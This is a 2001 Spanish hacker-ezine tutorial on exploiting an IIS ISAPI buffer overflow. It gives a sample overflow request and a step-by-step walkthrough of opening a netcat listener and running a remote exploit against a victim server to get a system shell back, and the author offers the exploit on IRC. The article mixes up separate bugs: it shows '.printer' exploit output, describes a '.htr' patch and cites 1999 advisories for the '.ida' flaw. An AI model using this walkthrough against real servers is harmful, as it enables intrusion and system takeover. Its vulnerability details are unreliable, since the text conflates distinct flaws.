- D I S I D E N T S - H A C K J O U R N A L -
Numero 2
XXII
TITLE: EXPLOTAR EL ISAPI BUG
Author: ZeRo-DivI
DISIDENTS ESPAÑA 2001 - LOS FUERA DE LA LEY
_______________________________________
/* */
/* -Explotar el ISAPI bug */
/* -By ZeRo-DivI */
/*____________________________________*/
INDICE
--------
1.Introduccion
2.¿Que es?
2.1.Tecnicamente
2.2.Traduccion
3.Primeras reacciones
3.1.De eEye
3.2.De Microsoft
3.3.Del resto
4.Como explotarlo
4.1.Herramientas
4.2.Manos a la obra
5.Lugares donde informarse
6.Despedida
INTRODUCCION
------------
Bueno, lo que voy a intentar con este texto es mostraros todo lo que se so-
bre este bug de nt, explotarlo, arreglarlo, lugares donde documentarse...
Este bug fue descubierto por eEye, que inmediatamente aviso del problema a
microsoft, y stos a su vez sacaron un parche muy tardio que no puedo evitar
un gran numero de ataques, pero bueno esto ya es parte de las primeras rea-
cciones.
2.¿QUE ES?
----------
2.1.Tecnicamente
Para empezar, debeis sabes que isapi es un filtro que poseen todas las ver-
siones de Internet Information Server, y que en este reside el problema.Es-
te filtro es el encargado de controlar los limites de los datos introduci-
dos por los usuarios, pues bien, el isapi k poseen los archivos con exten-
sion .ida (Indexing Service) no realizan las comprobaciones adecuadas, por
lo k el server resulta vulnerable a un atake de desbordamiento de bufer.
Cualkier persona que consiga explotar el bug consige acceso de sistema a
cualquier windows NT 4.0,Windows 2000, o Windows XP con IIS como servidor
web.Con este nivel,el atacante puede acer lo k kiera dentro del server,por
ejemplo añadir usuarios,ejecutar programas eliminar bases de datos... y mu-
chas kosas mas k pueden traer de cabeza a cualquier admin.
Este es un ataque tipico de desbordamiento de bufer:
GET /NULL.ida?[buffer]=X HTTP/1.1
Donde [buffer] tiene un tamaño aproximado de 240 bytes.
2.2.Traduccion
Pues lo que todo lo de arriba significa es lo siguiente:
Todos los IIS tienen un fayo bastante gordo que provoca que kualkier perso-
na que tenga unos minimos conocimientos, y el xploit adecuado pueda entrar
en un server y liar una buena, o simplemente limitarse a avisar, cosa que
por desgracia no ocurre muy a menudo.
3.PRIMERAS REACCIONES
---------------------
3.1.De eEye
Teneis que saber que eEye es una compañia de seguridad muy importante, para
enteraros de lo q va la kosa.Bueno, pues el equipo de eEye fueron los que
descubrieron el fallo,y los que avisaron a microsoft.Una semana despues de
avisar a microsoft, y viendo que estos no tomaban cartas en el asunto, los
de eEye decidieron sacar el problema a la luz, y despues de unos dias un
xploit para xplotar el bug, y a su vez un parche para arreglarlo.El parche
de eEye trataba consisitia en limitar las peticiones de archivos htr a 255
caracteres, y guardar en un log la IP del atacante que intentaba la sobre-
carga, eEye reconocio que no era perfecto, pero si mas seguro que las reco-
mendaciones que poco antes habia echo microsoft.
3.2.De Microsoft
Nada mas recibir la noticia, microsoft empezo a estudiar el fallo, o por lo
menos es lo que deberia de aber echo, pero no saco a la luz el bug, y menos
presento un parche para arreglarlo. Al ver que eEye desvelava el bug, mi-
crosoft lo unico que izo fue criticar a la compañia, y recomendar a los u-
suarios de IIS que eliminaran el filtro isapi,cosa que perjudicaria al ser-
vidor.Al final, y y con bastante retraso microsoft presento un parche que
solucionaba el problema sin cambiar las funcionalidades de los IIS.
3.3.Del resto
La noticia, tuvo dinstintas opiniones,algunos usuarios se sorprendieron del
tremendo error, otros que ya estaban aconstunbrados se limitaron a par-
chear, y aunque parezca raro,muchisimos admin de IIS no han parcheado por-
que ni siquiera saben de este bug. De cara al hack, la noticia fue tomada
como una forma mas de meterse en un server, eso de cara al hack, pero de
cara al lameruzeo a sido una forma genial de ir jodiendo servers a diestro
y siniestro.Las empresas de seguridad, se limitaron a dar informacion deta-
llada del bug, pero no sacaron ningun parche.
4.COMO EXPLOTARLO
-----------------
4.1.Herramientas
Antes de comenzar a explicaros que hay que acer y to eso,debereis saber que
hay dos programas que teneis que tener para poder explotar el bug.Estos dos
programas son el netcat (nc.exe), y un xploit remoto. Los dos vendran con
la revista, de todas formas no es muy dificil conseguirlos por la red.
4.2.Manos a la obra
Bueno, pues una vez tengamos estos dos programas lo primero que aremos sera
abrir una ventana de ms-dos, y ejecutar el netcat con el komando -l -p 100
-vv , vamos que lo que hay k poner es:
nc.exe -l -p 100 -vv
y os respondera asi:
listening on [any] 100 ...
Esto provocara qu el netcat se quede esperando una conexion al puerto 100.
Una vez echo esto abriremos otra ventana aparte tambien de ms-dos, esta pa-
ra ejecutar el xploit.Si ejecutas el xploit sin mas, te pondra algo asi:
iis5 remote .printer overflow.
dark spyrit / beavuh labs.
Usage: C:\xploit.exe
Todo esto quiere decir que para usarlo hay que proporcionar al xploit un
host victima, el puerto al que lo vas a ejecutar, tu host, y el puerto tuyo
k vas a utilizar.
En resumen:
xploit <80> <100>
Supongo que abreis caido para que ponemos 100, para los que no os recuerdo
que antes dejamos el netcat escuchando a ese mismo puerto, pa ver si pasaba
algo, pues bien, si el server al que as ejekutado el xploit es vulnerable,
en menos de 5 segundos os aparecera su C:\winnt\system32\ en vuestra venta-
na de ms-dos, si por el contrario, no lo es os saldra algo asi:
iis5 remote .printer overflow.
dark spyrit / beavuh labs.
Connected.
sent...
tou many need to send a carriage on your listener if the shell doesn´t appear.
have fun!
LUGARES DONDE INFORMARSE
------------------------
HispaSec: http://www.hispasec.com/unaaldia.asp?id=232
Parche de eEye: http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
Aviso de eEye: http://www.eEye.com/database/advisories/ad06081999/ad06081999.html
Boletín de Microsoft: http://www.microsoft.com/security/bulletins/ms99-019.asp
Aviso del CERT: http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html
CNet: http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni
Parche de microsoft para Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30833
Parche de microsoft para Windows 2000 Professional, Server y Advanced Server: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=30800
DESPEDIDA
---------
Bueno, solo quiero deciros que no seais muy critikos con este texto, puesto
que es el primero que escribo para la ezine.Espero que os sirva de mucho y
que aprendais algo con el,y tambien que no lo utiliceis para joder servidores.
Ah¡ otra kosa, si conseguis este texto de otra forma que no sea a traves de
la ezine, me podeis buscar por el irc, y no me importara pasaros el netcat o
el xploit.
PD: un saludo a la gente de #disidents #hack_escuela #hackademia #orglacurva
#seguridad #bandaancha #la_mafia ...